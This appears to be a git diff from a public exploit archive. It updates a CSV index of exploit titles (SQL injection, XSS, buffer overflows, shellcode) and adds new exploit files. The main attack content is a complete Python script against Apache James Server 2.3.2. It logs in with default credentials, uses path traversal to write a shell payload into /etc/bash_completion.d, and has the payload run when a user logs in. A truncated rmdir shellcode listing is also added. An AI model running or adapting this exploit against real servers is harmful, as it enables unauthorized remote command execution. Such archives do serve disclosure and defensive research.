SQL Injection Vulnerabilities",2011-03-21,"kurdish hackers team",php,webapps,0 35481,platforms/php/webapps/35481.txt,"NewsPortal 0.37 'post.php' Cross Site Scripting Vulnerability",2011-03-21,"kurdish hackers team",php,webapps,0 35482,platforms/php/webapps/35482.txt,"PluggedOut Blog 1.9.9 'year' Parameter Cross Site Scripting Vulnerability",2011-03-21,"kurdish hackers team",php,webapps,0 -35483,platforms/php/dos/35483.txt,"PHP 5.3.x 'Intl' Extension 'NumberFormatter::setSymbol()' Function Denial of Service Vulnerability",2011-03-10,thoger,php,dos,0 -35484,platforms/php/dos/35484.php,"PHP 5.3.x 'Zip' Extension 'stream_get_contents()' Function Denial of Service Vulnerability",2011-03-10,paulgao,php,dos,0 -35485,platforms/php/dos/35485.php,"PHP 5.x 'Zip' Extension 'zip_fread()' Function Denial of Service Vulnerability",2011-03-10,TorokAlpar,php,dos,0 +35483,platforms/php/dos/35483.txt,"PHP 5.3.x - 'Intl' Extension 'NumberFormatter::setSymbol()' Function Denial of Service Vulnerability",2011-03-10,thoger,php,dos,0 +35484,platforms/php/dos/35484.php,"PHP 5.3.x - 'Zip' Extension 'stream_get_contents()' Function Denial of Service Vulnerability",2011-03-10,paulgao,php,dos,0 +35485,platforms/php/dos/35485.php,"PHP 5.x - 'Zip' Extension 'zip_fread()' Function Denial of Service Vulnerability",2011-03-10,TorokAlpar,php,dos,0 35486,platforms/php/dos/35486.php,"PHP 5.x OpenSSL Extension openssl_encrypt Function Plaintext Data Memory Leak DoS",2011-03-08,dovbysh,php,dos,0 35487,platforms/php/dos/35487.php,"PHP 5.x OpenSSL Extension x Function openssl_decrypt Ciphertext Data Memory Leak DoS",2011-03-08,dovbysh,php,dos,0 35488,platforms/osx/local/35488.c,"Apple Mac OS X 10.6.x HFS Subsystem Information Disclosure Vulnerability",2011-03-21,"Dan Rosenberg",osx,local,0 -35489,platforms/multiple/dos/35489.pl,"Perl 5.x 'Perl_reg_numbered_buff_fetch()' Function Remote Denial of Service Vulnerability",2011-03-23,"Vladimir Perepelitsa",multiple,dos,0 +35489,platforms/multiple/dos/35489.pl,"Perl 5.x - 'Perl_reg_numbered_buff_fetch()' Function Remote Denial of Service Vulnerability",2011-03-23,"Vladimir Perepelitsa",multiple,dos,0 35490,platforms/php/webapps/35490.txt,"IceHrm 7.1 - Multiple Vulnerabilities",2014-12-08,LiquidWorm,php,webapps,0 35491,platforms/php/webapps/35491.txt,"PBBoard CMS - Stored XSS Vulnerability",2014-12-08,"Manish Tanwar",php,webapps,0 35492,platforms/php/webapps/35492.txt,"Free Article Submissions 1.0 - SQL Injection Vulnerability",2014-12-08,BarrabravaZ,php,webapps,0 35493,platforms/php/webapps/35493.txt,"Wordpress Ajax Store Locator 1.2 - Arbitrary File Download",2014-12-08,"Claudio Viviani",php,webapps,0 35495,platforms/multiple/remote/35495.txt,"Advantech/BroadWin SCADA WebAccess 7.0 - Multiple Remote Security Vulnerabilities",2011-03-23,"Ruben Santamarta ",multiple,remote,0 -35496,platforms/php/webapps/35496.txt,"MC Content Manager 10.1.1 Multiple Cross Site Scripting Vulnerabilities",2011-03-24,MustLive,php,webapps,0 -35497,platforms/php/webapps/35497.txt,"GrapeCity Data Dynamics Reports 1.6.2084.14 Multiple Cross Site Scripting Vulnerabilities",2011-03-24,Dionach,php,webapps,0 +35496,platforms/php/webapps/35496.txt,"MC Content Manager 10.1.1 - Multiple Cross Site Scripting Vulnerabilities",2011-03-24,MustLive,php,webapps,0 +35497,platforms/php/webapps/35497.txt,"GrapeCity Data Dynamics Reports 1.6.2084.14 - Multiple Cross Site Scripting Vulnerabilities",2011-03-24,Dionach,php,webapps,0 35498,platforms/php/webapps/35498.txt,"Ripe Website Manager 1.1 Cross Site Scripting and Multiple SQL Injection Vulnerabilities",2011-03-24,"High-Tech Bridge SA",php,webapps,0 35499,platforms/php/webapps/35499.txt,"netjukebox 4.01B/5.25 'skin' Parameter Cross Site Scripting Vulnerability",2011-03-24,"AutoSec Tools",php,webapps,0 35500,platforms/php/webapps/35500.txt,"Family Connections 2.3.2 'subject' Parameter HTML Injection Vulnerability",2011-03-25,"Zero Science Lab",php,webapps,0 35501,platforms/multiple/remote/35501.pl,"RealPlayer 11 '.rmp' File Remote Buffer Overflow Vulnerability",2011-03-27,KedAns-Dz,multiple,remote,0 -35502,platforms/windows/dos/35502.pl,"eXPert PDF Batch Creator 7.0.880.0 Denial of Service Vulnerability",2011-03-27,KedAns-Dz,windows,dos,0 +35502,platforms/windows/dos/35502.pl,"eXPert PDF Batch Creator 7.0.880.0 - Denial of Service Vulnerability",2011-03-27,KedAns-Dz,windows,dos,0 35503,platforms/windows/local/35503.rb,"Advantech AdamView 4.30.003 - (.gni) SEH Buffer Overflow",2014-12-09,"Muhamad Fadzil Ramli",windows,local,0 35505,platforms/php/webapps/35505.txt,"Wordpress Plugin Symposium 14.10 - SQL Injection",2014-12-09,"Kacper Szurek",php,webapps,0 35506,platforms/php/webapps/35506.pl,"Flat Calendar 1.1 - HTML Injection Exploit",2014-12-09,"ZoRLu Bugrahan",php,webapps,0 -35507,platforms/windows/dos/35507.pl,"DivX Player 7 Multiple Remote Buffer Overflow Vulnerabilities",2011-03-27,KedAns-Dz,windows,dos,0 +35507,platforms/windows/dos/35507.pl,"DivX Player 7 - Multiple Remote Buffer Overflow Vulnerabilities",2011-03-27,KedAns-Dz,windows,dos,0 35508,platforms/php/webapps/35508.txt,"Cetera eCommerce Multiple Cross Site Scripting and SQL Injection Vulnerabilities",2011-03-27,MustLive,php,webapps,0 35509,platforms/windows/remote/35509.pl,"FLVPlayer4Free 2.9 '.fp4f' File Remote Buffer Overflow Vulnerability",2011-03-27,KedAns-Dz,windows,remote,0 35510,platforms/php/webapps/35510.txt,"Humhub <= 0.10.0-rc.1 - SQL Injection Vulnerability",2014-12-10,"Jos Wetzels, Emiel Florijn",php,webapps,0 35511,platforms/php/webapps/35511.txt,"Humhub <= 0.10.0-rc.1 - Multiple Persistent XSS vulnerabilities",2014-12-10,"Jos Wetzels, Emiel Florijn",php,webapps,0 +35513,platforms/linux/remote/35513.py,"Apache James Server 2.3.2 - Remote Command Execution",2014-12-10,"Jakub Palaczynski",linux,remote,4555 35514,platforms/php/webapps/35514.txt,"OrangeHRM 2.6.2 'jobVacancy.php' Cross Site Scripting Vulnerability",2011-03-27,"AutoSec Tools",php,webapps,0 -35515,platforms/php/webapps/35515.txt,"Alkacon OpenCms 7.5.x Multiple Cross-Site Scripting Vulnerabilities",2011-03-28,antisnatchor,php,webapps,0 +35515,platforms/php/webapps/35515.txt,"Alkacon OpenCMS 7.5.x - Multiple Cross-Site Scripting Vulnerabilities",2011-03-28,antisnatchor,php,webapps,0 35516,platforms/php/webapps/35516.txt,"webEdition CMS 6.1.0.2 'DOCUMENT_ROOT' Parameter Local File Include Vulnerability",2011-03-28,eidelweiss,php,webapps,0 35517,platforms/php/webapps/35517.txt,"pppBLOG 0.3 'search.php' Cross Site Scripting Vulnerability",2011-03-28,"kurdish hackers team",php,webapps,0 35518,platforms/php/webapps/35518.txt,"OpenEMR 4.1.2(7) - Multiple SQL Injection Vulnerabilities",2014-12-10,Portcullis,php,webapps,80 -35520,platforms/php/webapps/35520.txt,"Claroline 1.10 Multiple HTML Injection Vulnerabilities",2011-03-28,"AutoSec Tools",php,webapps,0 +35519,platforms/linux/shellcode/35519.txt,"Linux x86 rmdir - 37 bytes Stack shellcode",2014-12-11,kw4,linux,shellcode,0 +35520,platforms/php/webapps/35520.txt,"Claroline 1.10 - Multiple HTML Injection Vulnerabilities",2011-03-28,"AutoSec Tools",php,webapps,0 35521,platforms/php/webapps/35521.txt,"osCSS 2.1 Cross Site Scripting and Multiple Local File Include Vulnerabilities",2011-03-29,"AutoSec Tools",php,webapps,0 35522,platforms/php/webapps/35522.txt,"Spitfire 1.0.3x 'cms_username' Cross Site Scripting Vulnerability",2011-03-29,"High-Tech Bridge SA",php,webapps,0 35523,platforms/php/webapps/35523.txt,"Tracks 1.7.2 URI Cross Site Scripting Vulnerability",2011-03-29,"Mesut Timur",php,webapps,0 35524,platforms/php/webapps/35524.txt,"XOOPS 'view_photos.php' Cross Site Scripting Vulnerability",2011-03-29,KedAns-Dz,php,webapps,0 35525,platforms/php/webapps/35525.txt,"GuppY 4.6.14 'lng' Parameter Multiple SQL Injection Vulnerabilities",2011-03-30,"kurdish hackers team",php,webapps,0 -35526,platforms/php/webapps/35526.txt,"YaCOMAS 0.3.6 OpenCms Multiple Cross-Site Scripting Vulnerabilities",2011-03-30,"Pr@fesOr X",php,webapps,0 +35526,platforms/php/webapps/35526.txt,"YaCOMAS 0.3.6 OpenCMS Multiple Cross-Site Scripting Vulnerabilities",2011-03-30,"Pr@fesOr X",php,webapps,0 35528,platforms/php/webapps/35528.txt,"GLPI 0.85 - Blind SQL Injection",2014-12-15,"Kacper Szurek",php,webapps,0 35529,platforms/windows/webapps/35529.txt,"Soitec SmartEnergy 1.4 - SCADA Login SQL Injection Authentication Bypass Exploit",2014-12-15,LiquidWorm,windows,webapps,0 -35530,platforms/windows/local/35530.py,"Mediacoder 0.8.33 build 5680 - SEH Buffer Overflow Exploit Dos (.m3u)",2014-12-15,s-dz,windows,local,0 -35531,platforms/windows/local/35531.py,"Mediacoder 0.8.33 build 5680 - SEH Buffer Overflow Exploit Dos (.lst)",2014-12-15,s-dz,windows,local,0 +35530,platforms/windows/local/35530.py,"Mediacoder 0.8.33 build 5680 - SEH Buffer Overflow Exploit DoS (.m3u)",2014-12-15,s-dz,windows,local,0 +35531,platforms/windows/local/35531.py,"Mediacoder 0.8.33 build 5680 - SEH Buffer Overflow Exploit DoS (.lst)",2014-12-15,s-dz,windows,local,0 35532,platforms/windows/local/35532.py,"jaangle 0.98i.977 - Denial of Service Vulnerability",2014-12-15,s-dz,windows,local,0 35533,platforms/php/webapps/35533.py,"Wordpress Download Manager 2.7.4 - Remote Code Execution Vulnerability",2014-12-15,"Claudio Viviani",php,webapps,0 35539,platforms/php/dos/35539.txt,"phpMyAdmin 4.0.x / 4.1.x / 4.2.x - DoS",2014-12-15,"Javer Nieto and Andres Rojas",php,dos,0 @@ -32017,23 +32019,23 @@ id,file,description,date,author,platform,type,port 35547,platforms/php/webapps/35547.txt,"ICJobSite 1.1 'pid' Parameter SQL Injection Vulnerability",2011-03-30,RoAd_KiLlEr,php,webapps,0 35548,platforms/php/webapps/35548.txt,"InTerra Blog Machine 1.84 'subject' Parameter HTML Injection Vulnerability",2011-03-31,"High-Tech Bridge SA",php,webapps,0 35549,platforms/unix/remote/35549.rb,"ActualAnalyzer 'ant' Cookie Command Execution",2014-12-16,metasploit,unix,remote,80 -35550,platforms/php/webapps/35550.txt,"Collabtive 0.6.5 Multiple Remote Input Validation Vulnerabilities",2011-03-31,"High-Tech Bridge SA",php,webapps,0 +35550,platforms/php/webapps/35550.txt,"Collabtive 0.6.5 - Multiple Remote Input Validation Vulnerabilities",2011-03-31,"High-Tech Bridge SA",php,webapps,0 35551,platforms/php/webapps/35551.txt,"CMS Papoo 6.0.0 Rev. 4701 - Stored XSS",2014-12-16,"Steffen Rösemann",php,webapps,80 35552,platforms/windows/dos/35552.py,"MoviePlay 4.82 '.avi' File Buffer Overflow Vulnerability",2011-03-31,^Xecuti0N3r,windows,dos,0 35553,platforms/windows/dos/35553.pl,"Microsoft Windows Media Player 11.0.5721.5145 '.avi' File Buffer Overflow Vulnerability",2011-03-31,^Xecuti0N3r,windows,dos,0 -35554,platforms/linux/remote/35554.txt,"Perl 5.x 'lc()' and 'uc()' Functions TAINT Mode Protection Security Bypass Weakness",2011-03-30,mmartinec,linux,remote,0 -35555,platforms/php/webapps/35555.txt,"AWCM 2.x 'search.php' Cross Site Scripting Vulnerability",2011-04-01,"Antu Sanadi",php,webapps,0 +35554,platforms/linux/remote/35554.txt,"Perl 5.x - 'lc()' and 'uc()' Functions TAINT Mode Protection Security Bypass Weakness",2011-03-30,mmartinec,linux,remote,0 +35555,platforms/php/webapps/35555.txt,"AWCM 2.x - 'search.php' Cross Site Scripting Vulnerability",2011-04-01,"Antu Sanadi",php,webapps,0 35556,platforms/hardware/webapps/35556.txt,"CIK Telecom VoIP router SVG6000RW - Privilege Escalation and Command Execution",2014-12-17,Chako,hardware,webapps,0 35557,platforms/php/webapps/35557.txt,"PHP-Fusion 'article_id' Parameter SQL Injection Vulnerability",2011-04-04,KedAns-Dz,php,webapps,0 35558,platforms/php/webapps/35558.txt,"PHP-Fusion 'articles.php' Cross Site Scripting Vulnerability",2011-04-02,KedAns-Dz,php,webapps,0 -35559,platforms/php/webapps/35559.txt,"MyBB 1.4/1.6 Multiple Security Vulnerabilities",2011-04-04,MustLive,php,webapps,0 +35559,platforms/php/webapps/35559.txt,"MyBB 1.4/1.6 - Multiple Security Vulnerabilities",2011-04-04,MustLive,php,webapps,0 35560,platforms/windows/remote/35560.txt,"RealNetworks GameHouse 'InstallerDlg.dll' 2.6.0.445 - ActiveX Control Multiple Vulnerabilities",2011-04-03,rgod,windows,remote,0 35561,platforms/php/webapps/35561.txt,"WPwizz AdWizz Plugin 1.0 'link' Parameter Cross Site Scripting Vulnerability",2011-04-04,"John Leitch",php,webapps,0 35562,platforms/php/webapps/35562.txt,"Placester WordPress Plugin 0.1 'ajax_action' Parameter Cross Site Scripting Vulnerability",2011-04-03,"John Leitch",php,webapps,0 35563,platforms/windows/remote/35563.pl,"EasyPHP 5.3.5.0 'index.php' Arbitrary File Download Vulnerability",2011-04-03,KedAns-Dz,windows,remote,0 -35564,platforms/php/webapps/35564.txt,"DoceboLMS 4.0.4 'index.php' Multiple HTML Injection Vulnerabilities",2011-04-03,LiquidWorm,php,webapps,0 -35565,platforms/php/webapps/35565.txt,"Anantasoft Gazelle CMS 1.0 Cross Site Scripting and SQL Injection Vulnerabilities",2011-04-04,"kurdish hackers team",php,webapps,0 -35566,platforms/php/webapps/35566.txt,"Yaws-Wiki 1.88-1 Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2011-04-04,"Michael Brooks",php,webapps,0 +35564,platforms/php/webapps/35564.txt,"DoceboLms 4.0.4 'index.php' Multiple HTML Injection Vulnerabilities",2011-04-03,LiquidWorm,php,webapps,0 +35565,platforms/php/webapps/35565.txt,"Anantasoft Gazelle CMS - 1.0 Cross Site Scripting and SQL Injection Vulnerabilities",2011-04-04,"kurdish hackers team",php,webapps,0 +35566,platforms/php/webapps/35566.txt,"Yaws-Wiki 1.88-1 - Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2011-04-04,"Michael Brooks",php,webapps,0 35567,platforms/php/webapps/35567.txt,"Eleanor CMS Cross Site Scripting and Multiple SQL Injection Vulnerabilities",2011-04-05,"High-Tech Bridge SA",php,webapps,0 35568,platforms/php/webapps/35568.txt,"UseBB 1.0.11 'admin.php' Local File Include Vulnerability",2011-04-05,"High-Tech Bridge SA",php,webapps,0 35569,platforms/php/webapps/35569.txt,"XOOPS 2.5 'banners.php' Multiple Local File Include Vulnerabilities",2011-04-04,KedAns-Dz,php,webapps,0 @@ -32051,13 +32053,15 @@ id,file,description,date,author,platform,type,port 35581,platforms/linux/remote/35581.rb,"Varnish Cache CLI Interface Remote Code Execution",2014-12-19,"Patrick Webster",linux,remote,6082 35582,platforms/php/webapps/35582.txt,"ProjectSend r561 - Multiple Vulnerabilities",2014-12-19,TaurusOmar,php,webapps,80 35583,platforms/php/webapps/35583.txt,"Piwigo 2.7.2 - Multiple Vulnerabilities",2014-12-19,TaurusOmar,php,webapps,80 +35584,platforms/php/webapps/35584.txt,"GQ File Manager 0.2.5 - Multiple Vulnerabilities",2014-12-19,TaurusOmar,php,webapps,80 35585,platforms/php/webapps/35585.txt,"Codiad 2.4.3 - Multiple Vulnerabilities",2014-12-19,TaurusOmar,php,webapps,80 35586,platforms/lin_x86-64/shellcode/35586.c,"x64 Linux bind TCP port shellcode (81 bytes, 96 with password)",2014-12-22,"Sean Dillon",lin_x86-64,shellcode,0 35587,platforms/lin_x86-64/shellcode/35587.c,"x64 Linux reverse TCP connect shellcode (77 to 85 bytes, 90 to 98 with password)",2014-12-22,"Sean Dillon",lin_x86-64,shellcode,0 35588,platforms/php/remote/35588.rb,"Lotus Mail Encryption Server (Protector for Mail) LFI to RCE",2014-12-22,"Patrick Webster",php,remote,9000 35589,platforms/windows/dos/35589.py,"NotePad++ 6.6.9 - Buffer Overflow",2014-12-22,TaurusOmar,windows,dos,0 35590,platforms/windows/local/35590.txt,"BitRaider Streaming Client 1.3.3.4098 Local Privilege Escalation Vulnerability",2014-12-23,LiquidWorm,windows,local,0 -35592,platforms/windows/dos/35592.py,"jetAudio 8.1.3 Basic (mp3) - Crash POC",2014-12-23,"Drozdova Liudmila",windows,dos,0 +35591,platforms/php/webapps/35591.txt,"phpMyRecipes 1.2.2 - (browse.php, category param) SQL injection",2014-12-23,"Manish Tanwar",php,webapps,80 +35592,platforms/windows/dos/35592.py,"jetAudio 8.1.3 Basic (mp3) - Crash PoC",2014-12-23,"Drozdova Liudmila",windows,dos,0 35593,platforms/windows/webapps/35593.txt,"SysAid Server Arbitrary File Disclosure",2014-12-23,"Bernhard Mueller",windows,webapps,0 35594,platforms/jsp/webapps/35594.txt,"NetIQ Access Manager 4.0 SP1 - Multiple Vulnerabilities",2014-12-23,"SEC Consult",jsp,webapps,8443 35595,platforms/linux/local/35595.txt,"GParted 0.14.1 - OS Command Execution",2014-12-23,"SEC Consult",linux,local,0 @@ -32074,9 +32078,9 @@ id,file,description,date,author,platform,type,port 35606,platforms/linux/remote/35606.txt,"MIT Kerberos 5 kadmind Change Password Feature Remote Code Execution Vulnerability",2011-04-11,"Felipe Ortega",linux,remote,0 35607,platforms/php/webapps/35607.txt,"Spellchecker Plugin 3.1 for WordPress 'general.php' Local and Remote File Include Vulnerabilities",2011-04-12,"Dr Trojan",php,webapps,0 35608,platforms/php/webapps/35608.txt,"The Gazette Edition 2.9.4 For Wordpress Multiple Security Vulnerabilities",2011-04-12,MustLive,php,webapps,0 -35609,platforms/php/webapps/35609.txt,"WebCalendar 1.2.3 Multiple Cross Site Scripting Vulnerabilities",2011-04-12,"High-Tech Bridge SA",php,webapps,0 +35609,platforms/php/webapps/35609.txt,"WebCalendar 1.2.3 - Multiple Cross Site Scripting Vulnerabilities",2011-04-12,"High-Tech Bridge SA",php,webapps,0 35610,platforms/php/webapps/35610.txt,"Plogger 1.0 Rc1 'gallery_name' Parameter Cross Site Scripting Vulnerability",2011-04-12,"High-Tech Bridge SA",php,webapps,0 -35611,platforms/php/webapps/35611.txt,"Website Baker 2.8.1 Multiple SQL Injection Vulnerabilities",2011-04-12,"High-Tech Bridge SA",php,webapps,0 +35611,platforms/php/webapps/35611.txt,"Website Baker 2.8.1 - Multiple SQL Injection Vulnerabilities",2011-04-12,"High-Tech Bridge SA",php,webapps,0 35612,platforms/windows/remote/35612.pl,"Winamp 5.6.1 '.m3u8' File Remote Buffer Overflow Vulnerability",2011-04-12,KedAns-Dz,windows,remote,0 35613,platforms/multiple/dos/35613.py,"TOTVS ERP Microsiga Protheus 8/10 Memory Corruption Denial Of Service Vulnerability",2011-04-13,waKKu,multiple,dos,0 35614,platforms/windows/remote/35614.c,"EC Software Help & Manual 5.5.1 Build 1296 'ijl15.dll' DLL Loading Arbitrary Code Execution Vulnerability",2011-04-14,LiquidWorm,windows,remote,0 @@ -32086,12 +32090,13 @@ id,file,description,date,author,platform,type,port 35618,platforms/php/webapps/35618.txt,"RunCMS 'partners' Module 'id' Parameter SQL Injection Vulnerability",2011-04-15,KedAns-Dz,php,webapps,0 35619,platforms/php/webapps/35619.txt,"PhoenixCMS 1.7 Local File Include and SQL Injection Vulnerabilities",2011-04-15,KedAns-Dz,php,webapps,0 35620,platforms/hardware/remote/35620.txt,"Technicolor THOMSON TG585v7 Wireless Router 'url' Parameter Cross-Site Scripting Vulnerability",2011-04-15,"Edgard Chammas",hardware,remote,0 -35621,platforms/php/webapps/35621.txt,"4images 1.7.9 Multiple Remote File Include and SQL Injection Vulnerabilities",2011-04-16,KedAns-Dz,php,webapps,0 +35621,platforms/php/webapps/35621.txt,"4images 1.7.9 - Multiple Remote File Include and SQL Injection Vulnerabilities",2011-04-16,KedAns-Dz,php,webapps,0 35622,platforms/windows/dos/35622.txt,"Wickr Desktop 2.2.1 Windows - Denial of Service Vulnerability",2014-12-27,Vulnerability-Lab,windows,dos,0 35623,platforms/multiple/webapps/35623.txt,"Pimcore 3.0 & 2.3.0 CMS - SQL Injection Vulnerability",2014-12-27,Vulnerability-Lab,multiple,webapps,0 35624,platforms/php/webapps/35624.txt,"PHPLIST 3.0.6 & 3.0.10 - SQL Injection Vulnerability",2014-12-27,Vulnerability-Lab,php,webapps,0 35625,platforms/php/webapps/35625.txt,"PMB <= 4.1.3 - Post-Auth SQL Injection Vulnerability",2014-12-27,"xd4rker dark",php,webapps,0 -35629,platforms/php/webapps/35629.txt,"chillyCMS 1.2.1 Multiple Remote File Include Vulnerabilities",2011-04-16,KedAns-Dz,php,webapps,0 +35626,platforms/php/webapps/35626.txt,"Easy File Sharing Webserver <= 6.8 - Persistent XSS",2014-12-27,"Sick Psycko",php,webapps,0 +35629,platforms/php/webapps/35629.txt,"chillyCMS 1.2.1 - Multiple Remote File Include Vulnerabilities",2011-04-16,KedAns-Dz,php,webapps,0 35630,platforms/php/webapps/35630.txt,"Joomla Component 'com_phocadownload' Local File Include Vulnerability",2011-04-18,KedAns-Dz,php,webapps,0 35631,platforms/php/webapps/35631.txt,"CRESUS 'recette_detail.php' SQL Injection Vulnerability",2011-04-19,"GrayHatz Security Group",php,webapps,0 35632,platforms/php/webapps/35632.txt,"XOOPS 2.5 'imagemanager.php' Local File Include Vulnerability",2011-04-18,KedAns-Dz,php,webapps,0 @@ -32106,10 +32111,19 @@ id,file,description,date,author,platform,type,port 35641,platforms/multiple/remote/35641.txt,"Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC /jde/MafletClose.mafService RENDER_MAFLET Parameter XSS",2011-04-19,"Juan Manuel Garcia",multiple,remote,0 35642,platforms/multiple/remote/35642.txt,"Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC /jde/JASMafletMafBrowserClose.mafService jdemafjasLinkTarget Parameter XSS",2011-04-19,"Juan Manuel Garcia",multiple,remote,0 35643,platforms/php/webapps/35643.txt,"webSPELL 4.2.2a Multiple Cross-Site Scripting Vulnerabilities",2011-04-19,"High-Tech Bridge SA",php,webapps,0 -35644,platforms/linux/remote/35644.txt,"Viola DVR VIO-4/1000 Multiple Directory Traversal Vulnerabilities",2011-04-19,QSecure,linux,remote,0 +35644,platforms/linux/remote/35644.txt,"Viola DVR VIO-4/1000 - Multiple Directory Traversal Vulnerabilities",2011-04-19,QSecure,linux,remote,0 35645,platforms/php/webapps/35645.txt,"Automagick Tube Script 1.4.4 'module' Parameter Cross Site Scripting Vulnerability",2011-04-20,Kurd-Team,php,webapps,0 35647,platforms/php/webapps/35647.txt,"SyCtel Design 'menu' Parameter Multiple Local File Include Vulnerabilities",2011-04-21,"Ashiyane Digital Security Team",php,webapps,0 35648,platforms/php/webapps/35648.txt,"Zenphoto 1.4.0.3 '_zp_themeroot' Parameter Multiple Cross Site Scripting Vulnerabilities",2011-04-21,"High-Tech Bridge SA",php,webapps,0 35649,platforms/php/webapps/35649.txt,"todoyu 2.0.8 'lang' Parameter Cross Site Scripting Vulnerability",2011-04-22,"AutoSec Tools",php,webapps,0 35650,platforms/php/webapps/35650.py,"LightNEasy 3.2.3 'userhandle' Cookie Parameter SQL Injection Vulnerability",2011-04-21,"AutoSec Tools",php,webapps,0 35651,platforms/php/webapps/35651.txt,"Dolibarr 3.0 Local File Include and Cross Site Scripting Vulnerabilities",2011-04-22,"AutoSec Tools",php,webapps,0 +35652,platforms/windows/remote/35652.sh,"Liferay Portal 7.0.x <= 7.0.2 - Pre-Auth RCE",2014-12-30,drone,windows,remote,0 +35653,platforms/php/webapps/35653.txt,"Nuke Evolution Xtreme 2.0 Local File Include and SQL Injection Vulnerabilities",2011-04-22,KedAns-Dz,php,webapps,0 +35654,platforms/windows/dos/35654.py,"AT-TFTP Server 1.8 'Read' Request Remote Denial of Service Vulnerability",2011-04-25,"Antu Sanadi",windows,dos,0 +35655,platforms/php/webapps/35655.txt,"TemaTres 1.3 '_search_expresion' Parameter Cross Site Scripting Vulnerability",2011-04-25,"AutoSec Tools",php,webapps,0 +35656,platforms/windows/dos/35656.pl,"eXPert PDF 7.0.880.0 '.pj' File Heab-based Buffer Overflow Vulnerability",2011-04-25,KedAns-Dz,windows,dos,0 +35657,platforms/php/webapps/35657.php,"Sermon Browser WordPress Plugin 0.43 Cross Site Scripting and SQL Injection Vulnerabilities",2011-04-26,Ma3sTr0-Dz,php,webapps,0 +35658,platforms/php/webapps/35658.txt,"html-edit CMS 3.1.x 'html_output' Parameter Cross Site Scripting Vulnerability",2011-04-26,KedAns-Dz,php,webapps,0 +35659,platforms/php/webapps/35659.txt,"Social Microblogging PRO 1.5 Stored XSS Vulnerability",2014-12-31,"Halil Dalabasmaz",php,webapps,80 +35660,platforms/php/remote/35660.rb,"ProjectSend Arbitrary File Upload",2014-12-31,metasploit,php,remote,80 diff --git a/platforms/hardware/remote/7858.php b/platforms/hardware/remote/7858.php index e0bf0cdf3..0317fef93 100755 --- a/platforms/hardware/remote/7858.php +++ b/platforms/hardware/remote/7858.php @@ -1,37 +1,37 @@ -"; // Uses the default login to auth (Admin:Admin), could use a dictionary instead. - -// Just some stuff to keep the user busy, aka Rickroll -$mystr="Unbelivable movie
"; - -echo $mystr; // Throw it all on the html page -?> - -# milw0rm.com [2009-01-25] +"; // Uses the default login to auth (Admin:Admin), could use a dictionary instead. + +// Just some stuff to keep the user busy, aka Rickroll +$mystr="Unbelivable movie
"; + +echo $mystr; // Throw it all on the html page +?> + +# milw0rm.com [2009-01-25] diff --git a/platforms/linux/remote/35513.py b/platforms/linux/remote/35513.py new file mode 100755 index 000000000..c8e449dbb --- /dev/null +++ b/platforms/linux/remote/35513.py @@ -0,0 +1,74 @@ +#!/usr/bin/python +# +# Exploit Title: Apache James Server 2.3.2 Authenticated User Remote Command Execution +# Date: 16\10\2014 +# Exploit Author: Jakub Palaczynski, Marcin Woloszyn, Maciej Grabiec +# Vendor Homepage: http://james.apache.org/server/ +# Software Link: http://ftp.ps.pl/pub/apache/james/server/apache-james-2.3.2.zip +# Version: Apache James Server 2.3.2 +# Tested on: Ubuntu, Debian +# Info: This exploit works on default installation of Apache James Server 2.3.2 +# Info: Example paths that will automatically execute payload on some action: /etc/bash_completion.d , /etc/pm/config.d + +import socket +import sys +import time + +# specify payload +#payload = 'touch /tmp/proof.txt' # to exploit on any user +payload = '[ "$(id -u)" == "0" ] && touch /root/proof.txt' # to exploit only on root +# credentials to James Remote Administration Tool (Default - root/root) +user = 'root' +pwd = 'root' + +if len(sys.argv) != 2: + sys.stderr.write("[-]Usage: python %s \n" % sys.argv[0]) + sys.stderr.write("[-]Exemple: python %s 127.0.0.1\n" % sys.argv[0]) + sys.exit(1) + +ip = sys.argv[1] + +def recv(s): + s.recv(1024) + time.sleep(0.2) + +try: + print "[+]Connecting to James Remote Administration Tool..." + s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) + s.connect((ip,4555)) + s.recv(1024) + s.send(user + "\n") + s.recv(1024) + s.send(pwd + "\n") + s.recv(1024) + print "[+]Creating user..." + s.send("adduser ../../../../../../../../etc/bash_completion.d exploit\n") + s.recv(1024) + s.send("quit\n") + s.close() + + print "[+]Connecting to James SMTP server..." + s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) + s.connect((ip,25)) + s.send("ehlo team@team.pl\r\n") + recv(s) + print "[+]Sending payload..." + s.send("mail from: <'@team.pl>\r\n") + recv(s) + # also try s.send("rcpt to: <../../../../../../../../etc/bash_completion.d@hostname>\r\n") if the recipient cannot be found + s.send("rcpt to: <../../../../../../../../etc/bash_completion.d>\r\n") + recv(s) + s.send("data\r\n") + recv(s) + s.send("From: team@team.pl\r\n") + s.send("\r\n") + s.send("'\n") + s.send(payload + "\n") + s.send("\r\n.\r\n") + recv(s) + s.send("quit\r\n") + recv(s) + s.close() + print "[+]Done! Payload will be executed once somebody logs in." +except: + print "Connection failed." \ No newline at end of file diff --git a/platforms/linux/remote/404.pl b/platforms/linux/remote/404.pl index c8e353ecb..ae90b33bb 100755 --- a/platforms/linux/remote/404.pl +++ b/platforms/linux/remote/404.pl @@ -43,6 +43,6 @@ print $_; } print " "; -close $remote; - -# milw0rm.com [2004-08-19] +close $remote; + +# milw0rm.com [2004-08-19] diff --git a/platforms/linux/shellcode/35519.txt b/platforms/linux/shellcode/35519.txt new file mode 100755 index 000000000..e29cf5f3d --- /dev/null +++ b/platforms/linux/shellcode/35519.txt @@ -0,0 +1,37 @@ +/* + +Title: Linux x86 rmdir - 37 bytes +Author: kw4 +useful for testing purposes + + + 08048060 <_start>: + 8048060: 31 c0 xor %eax,%eax + 8048062: 50 push %eax + 8048063: 68 6f 6c 68 6f push $0x6f686c6f + 8048068: 68 68 6f 6c 68 push $0x686c6f68 + 804806d: 68 2f 68 6f 6c push $0x6c6f682f + 8048072: 68 2f 74 6d 70 push $0x706d742f + 8048077: 89 e3 mov %esp,%ebx + 8048079: b0 28 mov $0x28,%al + 804807b: cd 80 int $0x80 + 804807d: 31 c0 xor %eax,%eax + 804807f: 89 c3 mov %eax,%ebx + 8048081: b0 01 mov $0x1,%al + 8048083: cd 80 int $0x80 + +*/ + +#include +#include + +unsigned char code[] = \ + 